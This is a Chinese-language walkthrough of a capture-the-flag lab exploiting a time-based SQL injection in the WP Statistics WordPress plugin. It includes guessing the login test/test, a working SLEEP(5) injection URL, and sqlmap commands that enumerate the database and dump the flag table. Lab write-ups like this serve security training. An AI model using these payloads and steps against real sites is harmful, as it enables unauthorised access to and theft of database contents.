靶标介绍:
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
开启靶场:
开始实验:
1、使用后台扫描工具扫描靶场链接
2、打开第一个/readme.html,找到后台登录页面
3、点击login.page,使用admin登录,显示错误,用户名未在本站点注册。最后发现下面有个“返回到test”,应该是有“test”用户名,经过尝试得到用户名和密码都为“test”
4、使用test登录,登录成功。
5、参考wpscan网站的WordPress 插件漏洞验证
https://wpscan.com/vulnerability/a0e40cfd-b217-481c-8fc4-027a0a023312/
Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s: http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
翻译:
以允许查看WP统计信息的用户身份登录,并通过获取随机数https://example.com/wp-admin/admin-ajax.php?action=rest-nonce,并在下面的URL中使用它,该URL将延迟5s:
6、必须先登录后才能获取随机数
http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce
7、使用随机数测试延迟,替换wpnonce=NONCE为上面获取的随机数wpnonce=00bb70a358
http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=00bb70a358&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR发现延迟5秒后显示如下图,存在sql注入。
8、使用Burp抓包,抓包时候要删除掉“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
”,只使用下面地址
http://eci-2ze8z8a5rz3fc378zp6e.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=00bb70a358&name=words&search_engine=aaa
9、把get内容保存为55.txt
10、使用sqlmap注入测试,查找当前数据库。
sqlmap.py -r 55.txt --batch --current-db
11、查找表
sqlmap.py -r 55.txt --batch -D wordpress --tables
12、查找字段
sqlmap.py -r 55.txt --batch -D wordpress -T flag --columns
13、获取字段值,得到flag
sqlmap.py -r 55.txt -D wordpress -T flag -C flag --dump